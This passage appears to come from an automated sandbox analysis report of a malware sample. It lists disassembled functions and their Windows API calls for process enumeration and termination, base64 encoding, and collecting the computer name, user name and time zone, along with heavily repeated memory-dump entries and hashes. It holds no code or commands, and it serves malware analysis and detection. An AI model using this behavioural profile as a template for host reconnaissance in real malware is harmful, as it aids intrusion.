                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                      • Instruction ID: 36dad1cb0fcbca0ffdfdd7c06b199559f2c5def7befbfc21f7e452e0f853ed5d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93017571201214AFE7205B20BD48FBFBEADEF85781F14151DF605D6190CBA99CA1C6BA
                                                                                                                                                                                                                                                                                      Function 004116B0 Relevance: 10.6, APIs: 7, Instructions: 62memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 798923657-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                      • Instruction ID: b00e23e61dcd96af2d5a42df421a2e3100774d4436a7fe2bda2c6e10979a2865
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C114575204202AFE7208F25EC44F67BBA9EF88700F15081DF6A2973A0DB75EC41CBA5
                                                                                                                                                                                                                                                                                      Function 00410990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32memorytimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                      • String ID: wwww
                                                                                                                                                                                                                                                                                      • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                      • Opcode ID: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                      • Instruction ID: 9378462ab9666fb6dba0cc2dba94d0b141e63b92265a990e46b9389926462d0e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5F02BB1B001105BE704573CBC0AB6A365A4BC6314F1A8225F591DF3E4DE749C5187C5
                                                                                                                                                                                                                                                                                      Function 00406FE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407060: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00407060: strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 00407009
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407041
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407059
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strlen$??3@FileFindFirst_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID: \LOCK
                                                                                                                                                                                                                                                                                      • API String ID: 3598502236-2879356017
                                                                                                                                                                                                                                                                                      • Opcode ID: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                      • Instruction ID: f44c4d4fe338d5c98bb0dd275f70c49df30f8ba6c2b9d28de0915081bc548b38
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF0D631D1811187DB1876799D45A6F72919F42730F540B3FF566B72C1E239BC80428B
                                                                                                                                                                                                                                                                                      Function 004108E0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                      • Opcode ID: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                      • Instruction ID: bdf7840bdb5d23557ca24adf21b56bf8b998ac4781c5fcf1cdb6254bbd2a154a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: feae78843d13951cbab47ac6d3ffa1349c38900b414b545e2837c5939a7629b8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34D05EF07012206BE720AB69BC5DB873A9CAF157A1F440031F986C6260D3B888C1C699
                                                                                                                                                                                                                                                                                      Function 004108B0 Relevance: 4.5, APIs: 3, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                      • Instruction ID: b80074a2059a1f3756ce7d307e25dbd51f94fcbc115dd2ec99a1d9f33b013242
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66D0A7F17012106BD6206764BC4DBC7395C9F05760F440021F981C62A0C27448C1C695
                                                                                                                                                                                                                                                                                      Function 00410BA0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
